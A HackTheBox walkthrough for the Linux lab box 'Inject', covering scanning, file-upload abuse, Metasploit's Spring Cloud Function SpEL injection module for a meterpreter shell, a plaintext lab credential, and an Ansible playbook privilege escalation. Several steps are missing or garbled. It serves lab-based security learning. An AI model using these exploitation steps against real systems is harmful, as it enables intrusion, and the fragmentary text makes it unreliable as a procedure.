Inject HackTheBox Walkthrough

Inject is a Linux system and is regarded as a simple box to hack. On this box, we'll start with a fundamental port scan and work our way laterally from there. After that, we will use the file upload function to get a username and password after enumeration and look for any vulnerabilities that may exist in a specific version. We will use a password disclosure vulnerability laterally to collect plain credentials. The next task will be to get local user access so that we can access root and find playbook vulnerabilities.

Inject HackTheBox Walkthrough

Table of content

The Beginning

  • Initial Nmap Port Scan
  • Web Page Enumeration
  • Directory enumeration
  • Uploads image and Enumeration
  • Spring cloud function Injection
  • User Shell
  • User Flag

Privilege Escalation

  • Finding Privilege Escalation Vectors
  • Playbook Vulnerability
  • Root Flag

The Beginning

We'll begin the evaluation with the standard TCP/IP port scanning.

Initial Nmap Port Scan

Using nmap, we first do a port scan to identify the target host's open ports and active services. Kali Linux includes Nmap, a well-known port scanning programme. We've used the flags -sV and -an sC to run a service version of the target machine's default NSE scripts during the port scan.

Flags features:

-sV:  Attempts to determine the service version

-sC: Scans with default NSE scripts

nmap -sV -sC

Web Page Enumeration

We enumerate port 8080 and access it over the browser showing an could service provider website which comes with eCommerce features. Nothing looks interesting here on the web page, so we decided to go with the directory enumeration 

Directory Enumeration

DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary-based attack against a web server and analyzing the response.

we are going to open the upload file after the enumeration

We intercepted the HTTP request for the POST method, which includes a png file format 

Change the request to GET and change directory as 



After multiple try we setings.xml file 

After the Enumeration using metasploit 

 use exploit/multi/http/spring_cloud_function_spel_injection
 set lhost
 set rhost

Here we will get meterpreter shell using this we can access local user

We Don't have access for user.txt file after try multiple times in setings.xml file as user name password

username phil
password :DocPhillovestoInject123

Finding Privilege Escalation Vectors:

after geting user.txt we are able to see it will helpful for enumeration

after completed running this script we are found something interesting

Playbook Vulnerability:

In google search as playbook vulnerability

create file as playbook_2.yml file and  download 

python -m SimpleHTTPServer 80

After download run the follwing commands 

Root Flag:

ls /bin/bash
ls /bin/bash
bash -p

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